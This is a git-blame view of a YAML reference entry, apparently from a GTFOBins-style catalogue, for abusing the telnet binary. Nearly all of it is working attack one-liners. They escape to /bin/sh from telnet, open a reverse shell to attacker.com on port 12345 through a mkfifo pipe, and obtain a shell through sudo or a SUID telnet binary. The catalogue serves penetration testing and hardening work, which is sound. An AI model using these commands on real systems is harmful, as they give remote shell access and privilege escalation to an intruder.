2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
|
functions:
|
2018-05-25 15:30:02 +02:00
|
|
|
execute-interactive:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
|
|
|
|
code: |
|
|
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
|
|
|
|
telnet $RHOST $RPORT
|
|
|
|
|
^]
|
|
|
|
|
!/bin/sh
|
2018-05-25 15:30:02 +02:00
|
|
|
reverse-shell-interactive:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
|
|
|
|
code: |
|
|
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
|
|
|
|
TF=$(mktemp)
|
|
|
|
|
rm $TF
|
|
|
|
|
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
2018-05-21 21:14:41 +02:00
|
|
|
sudo-enabled:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
|
|
|
|
code: |
|
|
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
|
|
|
|
sudo telnet $RHOST $RPORT
|
|
|
|
|
^]
|
|
|
|
|
!/bin/sh
|
2018-05-21 21:14:41 +02:00
|
|
|
suid-limited:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
|
|
|
|
code: |
|
|
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
|
|
|
|
./telnet $RHOST $RPORT
|
|
|
|
|
^]
|
|
|
|
|
!/bin/sh
|
2018-05-21 21:14:41 +02:00
|
|
|
---
|
